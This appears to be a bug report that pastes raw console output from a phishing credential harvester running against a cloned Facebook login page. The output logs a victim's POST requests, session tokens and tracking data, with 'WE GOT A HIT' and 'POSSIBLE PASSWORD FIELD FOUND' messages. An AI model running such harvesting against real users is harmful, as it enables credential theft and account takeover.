Put here what the actual behaviour should be when reporting an issue
10.0.0.75 - - [07/Aug/2023 15:33:10] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=5&rev=1007985184&s=%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
PARAM: local_storage[Session]=20
PARAM: local_storage[hb_timestamp]=13
PARAM: local_storage[signal_flush_timestamp]=13
PARAM: session_storage[TabId]=6
PARAM: session_storage[sp_pi]=216
PARAM: logtime=1
POSSIBLE USERNAME FIELD FOUND: user=0
PARAM: a=1
PARAM: req=6
PARAM: hs=19576.BP:DEFAULT.2.0..0.0
PARAM: dpr=1
PARAM: ccg=EXCELLENT
PARAM: rev=1007985184
PARAM: s=:nj5dyt:chsna6
PARAM: hsi=7264675851242366798
PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w
PARAM: csr=
PARAM: lsd=AVpW3FMZLeo
PARAM: jazoest=2926
POSSIBLE PASSWORD FIELD FOUND: __spin_r=1007985184
POSSIBLE PASSWORD FIELD FOUND: spin_b=trunk
POSSIBLE PASSWORD FIELD FOUND: __spin_t=1691439154
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:11] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundaryDNDBGtYgVYqjx4gQ
Content-Disposition: form-data; name="ts"
[{"app_id":"256281040558","posts":[["require_cond_exposure_logging",{"identifier":"Aa2GAcT5dIr0ZSQ0uy_eXbcOQiK9YrjaEk2WeLTreERc2kVFCff2fPdBZgzb8TAPIzt9ZG8XaqBrJ7fsWLOD630VuM7I3_Q"},1691440390058.5,0,112],["falco:bd_pdc_signals",{"e":"{\"asid\":\"a6d838ae-5cab-4da8-9b0e-39b7e8b00711\",\"ct\":1659080345,\"sjd\":\"ZShGbIhCekiyL+Z7iR4zlmaIOG5www9EV5/V5acDfs0L1Lw2Zatb0tBCYPNTJp4HCnEnu6sL6VzH9ttkOf4pde4ZEwntFBlj7KORn7NEQYa6PRInyRnjWn8jZbXy4f9WMULoTOPBMp1uvsnederjhg==\",\"sid\":-1}","r":1,"d":"$^|AcYRA3vxKuOU2OAtjDcCmH6a2bmul9V0EfNFQoUt2dphPXF_bkU0_RpI5naEjLWNnXU6hz-TG_NkvSQiDGox52L2bJi_5dA7ZJmSHvI92jwjK7qUXchmY|fd.AcZ2qqh8wgqiig-J2n2As91Li08OgTJgc6k-yCSGd2aSnvz4V5x6m7vieJVnHRc6yyjcl3GxpZUgjuSF1DpMBVCc","s":":nj5dyt:chsna6","t":1691440224482.8},1691440390058.5,1,521],["gk2_exposure",{"identifier":"1857581","hash":"AT5yTxGMp6le0PAt7KM"},1691440390300.6,0,53],["falco:web_time_spent_bit_array",{"e":"{\"sid_raw\":\"5bqbob:nj5dyt:chsna6\",\"start_time\":1691439329,\"tos_array\":[319,0],\"tos_cum\":14,\"tos_id\":\"chsna6\",\"tos_len\":64,\"tos_seq\":1}","r":1,"d":"$^|AcYRA3vxKuOU2OAtjDcCmH6a2bmul9V0EfNFQoUt2dphPXF_bkU0_RpI5naEjLWNnXU6hz-TG_NkvSQiDGox52L2bJi_5dA7ZJmSHvI92jwjK7qUXchmY|fd.AcZ2qqh8wgqiig-J2n2As91Li08OgTJgc6k-yCSGd2aSnvz4V5x6m7vieJVnHRc6yyjcl3GxpZUgjuSF1DpMBVCc","s":":nj5dyt:chsna6","t":1691440224723.3},1691440390300.6,0,428]],"user":"0","webSessionId":":nj5dyt:chsna6","trigger":"falco:ods_web_batch","send_method":"ajax","compression":""}]
------WebKitFormBoundaryDNDBGtYgVYqjx4gQ--
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:11] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=7&rev=1007985184&s=%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&__user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarytbSkjbAyPJWR8pCM
Content-Disposition: form-data; name="ts"
[{"app_id":"256281040558","posts":"swrwaVtbImZhbGNvOmJkX3BkY19zaWduYWxzIix7ImUiOiJ7XCJhc2lkXCI6XCJhNmQ4MzhhZS01Y2FiLTRkYTgtOWIwZS0zOWI3ZThiMDA3MTFcIixcImN0XCI6MTY1OTA4MDM0NSxcInNqZFwBQ/TRAVpTaEdiSWhDZWtpeUwrWjdpUjR6bHNFTmZNVjhNV3hxck1RMUZkakMwV2tXS1JpaEhST0dpVHYwK1BBOFZqem81b3Y2dy92dDdjQkVjMDdKL2NHZXdPZzc3L1laOUFhbC8zeklRdElPNjVMU09iT3dZMXNLa0xZZjg3Z3hCeEdOcU9LRld2NVNabXZsNEYzWXNmMlBCQT09XCIsXCJzaWRcIjotMX0iLCJyIjoxLCJkIjoiJF58QWNZUkEzdnhLdU9VMk9BdGpEY0NtSDZhMmJtdWw5X19WMEVmTkZRb1V0MmRwaFBYRl9ia1UwX1JwSTVuYUVqTFdOblhVNmh6LVRHX05rdlNRaURHb3g1MkwyYkppXzVkQTdaSm1TSHZJOTJqd2pLN3FVWGNobVl8ZmQuQWNaMnFxaDh3Z3FpaWctSjJuMkFzOTFMaTA4T2dUSmdjNmsteUNTR2QyYVNudno0VjV4Nm03dmllSlZuSFJjNnl5amNsM0d4cFpVZ2p1U0YxRHBNQlZDYyIsInMiOiI1YnFib2I6bmo1ZHl0OmNoc25hNiIsInQiOjE2OTE0MzkxNTQ4NTAuMX0sMTY5MTQzOTMyMDQ3My4yLDMsNTI3XSxRPzBvZHNfd2ViX2JhdGNoXT4FECRcIjp7XCIxMzQ0CQosZmFsY28uZXZlbnQuATVQdGltZV9zcGVudF9iaXRfYXJyYXlcBTRsanMudXNlX2JhbnphaS5sb2dfaW1tZWRpYXRlbAEjJFsxLG51bGxdLFwBKw0nHHBvc3RpbmdfBWEEXCIVJQx9LFwiCXswZmFicmljLnd3dy5DM/pqAHaWABRwbGFuZXMRmkB3cml0ZV90b190cmFuc3Bvci6fAAnEBbUZKRBxdWV1ZVLEAA0pDGViX3RKPwEu2AANKhF8QlMACH19ff7zAv7zAv7zAv7zAi7zAhg2NzkwNS43WfM4MzM0ODEuNywwLDcwOF1d","user":"0","webSessionId":"5bqbob:nj5dyt:chsna6","send_method":"beacon","compression":"snappy_base64","snappy_ms":2}]
------WebKitFormBoundarytbSkjbAyPJWR8pCM--
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:11] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=4&rev=1007985184&s=%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
PARAM: local_storage[Session]=20
PARAM: local_storage[hb_timestamp]=13
PARAM: local_storage[signal_flush_timestamp]=13
PARAM: session_storage[TabId]=6
PARAM: session_storage[sp_pi]=216
PARAM: logtime=1
POSSIBLE USERNAME FIELD FOUND: user=0
PARAM: a=1
PARAM: req=8
PARAM: hs=19576.BP:DEFAULT.2.0..0.0
PARAM: dpr=1
PARAM: ccg=EXCELLENT
PARAM: rev=1007985184
PARAM: s=:nj5dyt:chsna6
PARAM: hsi=7264675851242366798
PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w
PARAM: csr=
PARAM: lsd=AVpW3FMZLeo
PARAM: jazoest=2926
POSSIBLE PASSWORD FIELD FOUND: __spin_r=1007985184
POSSIBLE PASSWORD FIELD FOUND: spin_b=trunk
POSSIBLE PASSWORD FIELD FOUND: __spin_t=1691439154
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:12] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 -
[] WE GOT A HIT! Printing the output:
PARAM: local_storage[Session]=20
PARAM: local_storage[hb_timestamp]=13
PARAM: local_storage[signal_flush_timestamp]=13
PARAM: session_storage[TabId]=6
PARAM: session_storage[sp_pi]=216
PARAM: logtime=1
POSSIBLE USERNAME FIELD FOUND: user=0
PARAM: a=1
PARAM: req=9
PARAM: hs=19576.BP:DEFAULT.2.0..0.0
PARAM: dpr=1
PARAM: ccg=EXCELLENT
PARAM: rev=1007985184
PARAM: s=:nj5dyt:chsna6
PARAM: hsi=7264675851242366798
PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w
PARAM: csr=
PARAM: lsd=AVpW3FMZLeo
PARAM: jazoest=2926
POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184
POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk
POSSIBLE PASSWORD FIELD FOUND: spin_t=1691439154
[] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:12] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarybO4dSog6yA0G4WlJ
Content-Disposition: form-data; name="ts"
[{"app_id":"256281040558","posts":[["falco:bd_pdc_signals",{"e":"{\"asid\":\"a6d838ae-5cab-4da8-9b0e-39b7e8b00711\",\"ct\":1659080345,\"sjd\":\"ZShGbIhCekiyL+Z7iR4zlmaIOG5www9EV5/V5acDfs0L1Lw2Zatb0tBCYPNTJp4HCnEnu6sL6VzH9ttkOf4pde4ZEwntFBlj7KORn7NEQYa6PRInyRnjWn8jZbXy4f9WMULoTOPBMp1uvsnederjhg==\",\"sid\":-1}","r":1,"d":"$^|AcYRA3vxKuOU2OAtjDcCmH6a2bmul9__V0EfNFQoUt2dphPXF_bkU0_RpI5naEjLWNnXU6hz-TG_NkvSQiDGox52L2bJi_5dA7ZJmSHvI92jwjK7qUXchmY|fd.AcZ2qqh8wgqiig-J2n2As91Li08OgTJgc6k-yCSGd2aSnvz4V5x6m7vieJVnHRc6yyjcl3GxpZUgjuSF1DpMBVCc","s":":nj5dyt:chsna6","t":1691440224482.8},1691440390058.5,2,521]],"user":"0","webSessionId":":nj5dyt:chsna6","send_method":"beacon","compression":""},{"app_id":"256281040558","posts":"/AeAW1siZmFsY286b2RzX3dlYl9iYXRjaCIseyJlIjoie1wiBRAkXCI6e1wiMTM0NAkKBTNQLmV2ZW50LmJkX3BkY19zaWduYWxzCSCYanMudXNlX2JhbnphaS5sb2dfY3JpdGljYWxcIjpbMSxudWxsXSxcASgNJCBwb3N0aW5nX2UBVB0lCH0sXA1uMGZhYnJpYy53d3cuQzPuZwBqkAAUcGxhbmVzEZRAd3JpdGVfdG9fdHJhbnNwb3IFmQAyLr4ABa8ZKRBxdWV1ZQG+MiUAOgsBKGltbWVkaWF0ZWx5ASteDgEFp1YsADkVCYAEYmQugwEuHwEJIBXJFaAAMQnFPkkAQQFIdGltZV9zcGVudF9iaXRfYXJyYQGoCHtcIkbWAVafALrZAQ2kBGViUnsArs4A9C4BfX19IiwiciI6MSwiZCI6IiRefEFjWVJBM3Z4S3VPVTJPQXRqRGNDbUg2YTJibXVsOV9fVjBFZk5GUW9VdDJkcGhQWEZfYmtVMF9ScEk1bmFFakxXTm5YVTZoei1UR19Oa3ZTUWlER294NTJMMmJKaV81ZEE3WkptU0h2STkyandqSzdxVVhjaG1ZfGZkLkFjWjJxcWg4d2dxaWlnLUoybjJBczkxTGkwOE9nVEpnYzZrLXlDU0dkMmFTbnZ6NFY1eDZtN3ZpZUpWbkhSYzZ5eWpjbDNHeHBaVWdqdVNGMURwTUJWQ2MiLCJzIjoiNjEzYTI2Om5qNWR5dDpjaHNuYTYiLCJ0IjoxNjkxNDQwMjI5ODM5Ljd9LDE2OTE0NDAzOTU0MTUuMSwwLDk3Ml1d","user":"0","webSessionId":"613a26:nj5dyt:chsna6","compression":"snappy_base64","snappy_ms":1}]
------WebKitFormBoundarybO4dSog6yA0G4WlJ--
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:30] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=a&rev=1007985184&s=613a26%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&__user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundaryxRBtH0BF8mNjPkJ3
Content-Disposition: form-data; name="ts"
[{"app_id":"256281040558","posts":"ignwVltbImZhbGNvOndlYl90aW1lX3NwZW50X2JpdF9hcnJheSIseyJlIjoie1wic2lkX3Jhd1wiOlwiNjEzYTI2Om5qNWR5dDpjaHNuYTZcIixcInN0YXJ0XwFKSFwiOjE2OTE0NDAzOTQsXCJ0b3MJUyxcIjpbMjg2NzMsMF0NGAhjdW0BLwA4DQ8caWRcIjpcImMZVwE9CGxlbgElADcNJfDwc2VxXCI6Mn0iLCJyIjoxLCJkIjoiJF58QWNZUkEzdnhLdU9VMk9BdGpEY0NtSDZhMmJtdWw5X19WMEVmTkZRb1V0MmRwaFBYRl9ia1UwX1JwSTVuYUVqTFdOblhVNmh6LVRHX05rdlNRaURHb3g1MkwyYkppXzVkQTdaSm1TSHZJOTJqd2pLN3FVWGNobVl8ZmQuQWNaMnFxaDh3Z3FpaWctSjJuMkFzOTFMaTA4T2dUSmdjNmsteUNTR2QyYVNudno0VjV4Nm03dmllSlZuSFJjNnl5amNsM0d4cFpVZ2p1U0YxRHBNQlZDYyIsInMiOlJ1AQwiLCJ0NWkwMjQ0NDY3LjQwMDF9LC19PDQxMDA0My4xLDAsNDM5XSwu8QEMYmx1ZS72ASRuYXZpZ2F0aW9uPfcganNvbl9kYXRhJZQ8e1xcXCJzb3VyY2VfcGF0aAEPADoBBUhYV2ViTG9naW5Db250cm9sbGVyARcALAEFDTAQdG9rZW4BEAUxHDk2ZTg4YWYzAREFJgxkZXN0GVQMbnVsbBkXGTsVGBBjYXVzZQE9BU4UdW5sb2FkAQ8FNQBzTawEXFwJHwg2MTNGsAIEXFwNLQnPFGVmX3BhZwlTFWYNHAh1cmkBLwVrZGh0dHBzOi8vd3d3LmZhY2Vib29rLmNvbS9sAf8MLnBocAErCH1cIv6bAv6bAv6bAv6bAkKbAgg5LjI2mAIoNC42LDAsNjAwXV0=","user":"0","webSessionId":"613a26:nj5dyt:chsna6","send_method":"beacon","compression":"snappy_base64","snappy_ms":1}]
------WebKitFormBoundaryxRBtH0BF8mNjPkJ3--
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:30] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264675851242366798&req=b&rev=1007985184&s=613a26%3Anj5dyt%3Achsna6&spin_b=trunk&__spin_r=1007985184&spin_t=1691439154&__user=0&dpr=1&jazoest=2926&lsd=AVpW3FMZLeo HTTP/1.1" 302 -
10.0.0.75 - - [07/Aug/2023 15:33:38] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarykqBGcHbAys4y1CnE
Content-Disposition: form-data; name="ts"
[{"app_id":"256281040558","posts":"+RLwoltbInJlcXVpcmVfY29uZF9leHBvc3VyZV9sb2dnaW5nIix7ImlkZW50aWZpZXIiOiJBYTNSbkpTc1NxaHJSUkJsMVVjdW5Cc3Z3QktOSWdxNVE4U1d5V1RWbkMwbVpBUTJnV21Cc01rUkFKaUdYbWFiMDdpV0Jta1hHb2o3X2ZJdFhELXZpcjgifSwxNjkxNDQwNDE5NDIwLjYsMCwxMDRdLFvCoQDwWDJQenU4QkhuTmlEbHZ3UGFicV9GcVNNU0Zta1NEUWFHZFhCNDVZQ1lQeW5yelhTMnZXcnpENXJtWDBUaGhsMElqMUJ4SE9mb3RYVjAxaTh5dWtHSlVuM1RNOqUACDEuMQWlADgBpQhnazI1PUI1AZgxMDczNTAwIiwiaGFzaCI6IkFUN2FKbWZucVd5aW94T09TUnMifSwuAgEJXQQ1MwFcvqIB8FQwODlPNW5mOHE5aVRFNldLeTQwNHRDNVB0WUVtOERaRURvdmI3UkZoem1uZmlFcG9CUU1GLTBESU11UFdrdmJUY0xTclpkenpwUHo2WTNOdlFwOWNzQv0AADIF/QA0AaFy/QAUNzA4MjUzLvwAQDVuNGhCTDNZVE1uUVd0Y3IwUlwABDUyglsAFDY3NjgzNy5bADw0Tjh3QlpBOGN0Q2RId1hPblsAvlcB8Fwzby05anpqSWNGVXBQbVk1QkZqV01NaDhnSUNVQ3dWbnlQNE9GTVh5azBwNVl4b0JTSzZvLUJmYkV3SWZwZEctNnQ2WmZ0dldMSEwyWWNka09FdlgwVmpZbUtWZyI+/gEAMyFeBDExggMBGDEwOTk4OTMuBAFANWtseTJMU1pWX0RLR1JMMUFCXwEBXdZbAvBYMTNUZXV4bHFjOXFkdlpDZlJkVFNmRnZ1R3Utckt1ZE1mbE9MeGZ6UVFFZXhBek9yNURyTnZtcjFTckliQmJoMGVfdnU3cFVUdFhkR3Z2ckdMQzA5Q19SbTRCpAAANCEBaVzwVmZhbGNvOndlYl9ibHVlX3RpbWVfc3BlbnRfbmF2aWdhdGlvbiIseyJlIjoie1wianNvbl9kYXRhXCI6XCJ7XFxcInNvdXJjZV9wYXRoXFxcIjpudWxsLAEKAHMJGRB0b2tlbgEQGRoQZGVzdF8VMQEcSFhXZWJMb2dpbkNvbnRyb2xsZXIBFwAsAQUFLhlGARMcOTZlODhhZjMBDAUkMGltcHJlc3Npb25faWQBFgUnQDFvM29TU2JxVEJTdnJzQkdZARoFMBBjYXVzZQEOBSgIbG9hBTUFGxhzaWRfcmF3FR1MNjEzYTI2OmwwYzJhejppa3UzYWcBHQUtFHJlZmVycgmtBUsVGgW2FGVmX3BhZwlpAG4xGAUaCHVyaQErBTRkaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL2whEgwucGhwASvw7H1cIn0iLCJyIjoxLCJkIjoiJF58QWNZUkEzdnhLdU9VMk9BdGpEY0NtSDZhMmJtdWw5X19WMEVmTkZRb1V0MmRwaFBYRl9ia1UwX1JwSTVuYUVqTFdOblhVNmh6LVRHX05rdlNRaURHb3g1MkwyYkppXzVkQTdaSm1TSHZJOTJqd2pLN3FVWGNobVl8ZmQuQWNiVkZrMmVDc2s0U3VvUml1d1FrZTNDNmp1Y0l6RmZVVHozVXVidmUtczZRaF8wa2FONHY2NzVjNDJFcDhiMGJOWnIzbk9WN2JVV2JkQld0ZjZndTJnbSIsInMiOlJ2ARQiLCJ0IjqtyhwzNzkyMzMuNT7dAxQ1LDAsNjbFOFncPHBlcmZfZGV2aWNlX2luZm/hg8FKAGVJ1khjcHVfY29yZXNcIjo4LFwicmFtVckkImdwdV9yZW5kZSHnQfY0QU5HTEUgKEludGVsLCAFBxwoUikgSXJpcwEIgFBsdXMgR3JhcGhpY3MgRGlyZWN0M0QxMSB2c181XzAgcAUHCCwgRAEVDClcIiwJYxR2ZW5kb3IFYShHb29nbGUgSW5jLg1nACn+/AH+/AH+/AH+/AFG/AEMNzQuMjL8ASQ2MCwwLDQ1MF1d","user":"0","webSessionId":"613a26:l0c2az:iku3ag","trigger":"falco:web_blue_time_spent_navigation","send_method":"ajax","compression":"snappy_base64","snappy_ms":3}]
------WebKitFormBoundarykqBGcHbAys4y1CnE--
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:40] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264681108549420648&req=1&rev=1007985184&s=613a26%3Al0c2az%3Aiku3ag&spin_b=trunk&__spin_r=1007985184&spin_t=1691440378&__user=0&dpr=1&jazoest=2850&lsd=AVo00zASTAI HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: ------WebKitFormBoundarycE95dGG679gru9XS
Content-Disposition: form-data; name="ts"
[{"app_id":"256281040558","posts":"vAyAW1siZmFsY286b2RzX3dlYl9iYXRjaCIseyJlIjoie1wiBRAkXCI6e1wiMTM0NAkKBTMYLmV2ZW50LgU1ZGx1ZV90aW1lX3NwZW50X25hdmlnYXRpb25cBTq4anMudXNlX2JhbnphaS5sb2dfaW1tZWRpYXRlbHlcIjpbMSxudWxsXSxcImpzLmIJJxxwb3N0aW5nXwVnHSUMfSxcIgmBMGZhYnJpYy53d3cuQzP6agB2lgAUcGxhbmVzEZpAd3JpdGVfdG9fdHJhbnNwb3IFnwQyLB3EBbUZKRBxdWV1ZQHEMiUANhQBAR9eCAEBnh0gOQMNaAhlYl9mhAEuHQENMBHBFZgNeU5ZAEhwZXJmX2RldmljZV9pbmZvX2xvAYwAeyWspsMAdssBDZgEZWJSbwCuwgABwwwyOTY2SRAMbXMudFWYCC5xYUEtCRodF0xiaXRzLmpzX2luaXRpYWxpemVkXFmV9DABfX19fSIsInIiOjEsImQiOiIkXnxBY1lSQTN2eEt1T1UyT0F0akRjQ21INmEyYm11bDlfX1YwRWZORlFvVXQyZHBoUFhGX2JrVTBfUnBJNW5hRWpMV05uWFU2aHotVEdfTmt2U1FpREdveDUyTDJiSmlfNWRBN1pKbVNIdkk5Mmp3aks3cVVYY2htWXxmZC5BY2JWRmsyZUNzazRTdW9SaXV3UWtlM0M2anVjSXpGZlVUejNVdWJ2ZS1zNlFoXzBrYU40djY3NWM0MkVwOGIwYk5acjNuT1Y3YlVXYmRCV3RmNmd1MmdtIiwicyI6IjYxM2EyNjpsMGMyYXo6aWt1M2FnIiwidCI6MTY5MTQ0MDM4NDI0MC4yfSwxNjkxNDQwNDI0NDI1LjcsMCwxMDU5XSyRUyHOOWYkX2JpdF9hcnJheZ1eKHNpZF9yYXdcIjpcUnoAJFwiLFwic3RhcnQFSghcIjoRdRwxOSxcInRvcwlTIa8UMjU1LDBdDRYYY3VtXCI6OA0OAGkh0AhcImkFzgBcAVQBOhRsZW5cIjoRSBhzZXFcIjow/usB/usB/usB/usBNusBFDcyNDZ9LDF0ODI3NDMxLjYsMCw0MzBdXQ==","user":"0","webSessionId":"613a26:l0c2az:iku3ag","trigger":"falco:web_time_spent_bit_array","send_method":"ajax","compression":"snappy_base64","snappy_ms":1}]
------WebKitFormBoundarycE95dGG679gru9XS--
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:33:48] "POST /ajax/bz?a=1&ccg=EXCELLENT&dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w&hs=19576.BP%3ADEFAULT.2.0..0.0&hsi=7264681108549420648&req=2&rev=1007985184&s=613a26%3Al0c2az%3Aiku3ag&spin_b=trunk&__spin_r=1007985184&spin_t=1691440378&user=0&dpr=1&jazoest=2850&lsd=AVo00zASTAI HTTP/1.1" 302 -
[*] WE GOT A HIT! Printing the output:
PARAM: local_storage[Session]=20
PARAM: local_storage[hb_timestamp]=13
PARAM: local_storage[signal_flush_timestamp]=13
PARAM: session_storage[TabId]=6
PARAM: session_storage[sp_pi]=216
PARAM: logtime=0
POSSIBLE USERNAME FIELD FOUND: user=0
PARAM: a=1
PARAM: req=3
PARAM: hs=19576.BP:DEFAULT.2.0..0.0
PARAM: dpr=1
PARAM: ccg=EXCELLENT
PARAM: rev=1007985184
PARAM: s=613a26:l0c2az:iku3ag
PARAM: hsi=7264681108549420648
PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w
PARAM: csr=
PARAM: lsd=AVo00zASTAI
PARAM: jazoest=2850
POSSIBLE PASSWORD FIELD FOUND: __spin_r=1007985184
POSSIBLE PASSWORD FIELD FOUND: spin_b=trunk
POSSIBLE PASSWORD FIELD FOUND: __spin_t=1691440378
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:09] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 -
[] WE GOT A HIT! Printing the output:
PARAM: local_storage[Session]=20
PARAM: local_storage[hb_timestamp]=13
PARAM: local_storage[signal_flush_timestamp]=13
PARAM: session_storage[TabId]=6
PARAM: session_storage[sp_pi]=216
PARAM: logtime=0
POSSIBLE USERNAME FIELD FOUND: user=0
PARAM: a=1
PARAM: req=4
PARAM: hs=19576.BP:DEFAULT.2.0..0.0
PARAM: dpr=1
PARAM: ccg=EXCELLENT
PARAM: rev=1007985184
PARAM: s=613a26:l0c2az:iku3ag
PARAM: hsi=7264681108549420648
PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w
PARAM: csr=
PARAM: lsd=AVo00zASTAI
PARAM: jazoest=2850
POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184
POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk
POSSIBLE PASSWORD FIELD FOUND: spin_t=1691440378
[] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.0.0.75 - - [07/Aug/2023 15:34:09] "POST /ajax/webstorage/process_keys/?state=1 HTTP/1.1" 302 -
[] WE GOT A HIT! Printing the output:
PARAM: local_storage[Session]=20
PARAM: local_storage[hb_timestamp]=13
PARAM: local_storage[signal_flush_timestamp]=13
PARAM: session_storage[TabId]=6
PARAM: session_storage[sp_pi]=216
PARAM: logtime=0
POSSIBLE USERNAME FIELD FOUND: user=0
PARAM: a=1
PARAM: req=5
PARAM: hs=19576.BP:DEFAULT.2.0..0.0
PARAM: dpr=1
PARAM: ccg=EXCELLENT
PARAM: rev=1007985184
PARAM: s=613a26:l0c2az:iku3ag
PARAM: hsi=7264681108549420648
PARAM: dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU29zEdEc8uwdK0lW4o3Bw5VCwjE3awbG78b87C0yE7i0n24o5-0me2218w5uw5Uwdq0Ho2ewnE3fw5rwSyE1582ZwrU19E36w
PARAM: csr=
PARAM: lsd=AVo00zASTAI
PARAM: jazoest=2850
POSSIBLE PASSWORD FIELD FOUND: spin_r=1007985184
POSSIBLE PASSWORD FIELD FOUND: __spin_b=trunk
POSSIBLE PASSWORD FIELD FOUND: spin_t=1691440378
[] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
